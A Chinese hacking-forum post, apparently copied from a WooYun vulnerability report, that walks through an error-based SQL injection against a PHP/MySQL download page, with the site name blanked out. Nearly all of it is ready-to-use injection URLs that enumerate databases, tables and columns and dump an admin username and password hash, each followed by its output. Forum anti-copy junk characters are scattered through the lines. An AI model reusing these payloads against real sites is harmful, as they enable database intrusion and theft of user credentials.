找回密码
 立即注册
查看: 2569|回复: 0
打印 上一主题 下一主题

php+mysql高级爆错注入经测算有效

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:52:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://www.wooyun.org/bugs/wooyun-2010-01666; g2 N0 q. M7 ]7 G
/ b2 A, \' F( |/ W5 _5 c! _
之前想找个测试 没想到这有 可以测试下做个记录而已 ' N8 a0 t" Z3 ~+ A$ W

! L- i: A# G" J( z1 t5 }http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_0034 N2 Z% S; A5 [' B, G! P
5 D$ N) D# s4 d7 }" v: w
/data0/htdocs/leqi_new/app/myapp.php
' s4 P" J5 K' h9 ]5 r2 ]: F; d( g( i; f
或者8 z/ S/ w5 R# b3 h
/ x0 H0 @; R% [2 E+ `! u3 z2 F
/**********version()**********/ 5.1.49-log
6 w/ K' Y9 i- K( C) V* C, }( Rhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0034 X3 }% Z" |! z+ D0 K- N# L
2 Z# f# s8 }+ r# \
/**********user()**********/  1 K. T* e" `7 j7 G5 U( F
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
0 R7 X9 K$ Q- s6 ?+ j: p! O/ u1 s2 q
/**********database()**********/  leqi! g) f* W0 J: c
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
5 }7 k# m3 {  p, [
; h# Z0 x& l. a  I( I1 U" V6 ^+ K/**********limit依次递归爆库**********/( K: z3 S2 m$ _! s* W/ p' T
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
% O( `) V( }9 Ainformation_schema
5 P" r8 a* {2 }8 \http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
' u7 X( _& O0 u1 V; ^" pleqi; v. t/ G  @9 S+ W; c
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
' k# |) Y% P, v& ?test
) I2 ^& E( {. X* K0 n  W2 N1 B; ~- R8 d' C, w* u
/**********limit依次递归爆表名**********/
) X; R9 [' g% T$ q8 shttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0038 V7 f& a2 o; s5 l
users6 J; n8 F7 F8 s! N: Q! ]: E$ m

' G8 S( |. y2 }2 g/**********limit依次递归爆字段名**********/
7 v; B0 g* o$ g/ Qhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003- ]1 T/ K6 F* m' K9 N; g- }
user_id,username,nickname,passwd,group_id4 b9 Q9 I9 N7 _- k+ n3 e# G( D
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
$ A0 k) k" X5 K0 A& n/wapc/5000_0005_003
, r( R6 H* [+ E' @8 S/ T0 T11 21
2 K9 s7 ~, f7 z" Ohttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23: [: A' _5 Z8 ]6 v7 ?
/wapc/5000_0005_003# F: V( K) U" P) V. H7 a; P$ E
11 341 351 361
4 p3 c! Q; U& E5 T6 q7 V/**********爆数据**********/9 U! T- g1 F3 l& ?9 q, f% k
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
  l# [+ q* K' M- T& P; z/ padmin2 |: p  |, I! e  f# }
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
! {7 p3 W2 [1 g# @7 B; m6a8b4574ca231eb8bd52764d4978ffcd
3 \) r7 a8 V1 p5 @7 @5 n2 w8 ^1 ^

0 |6 }1 c& A/ x7 I, f, d' f
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表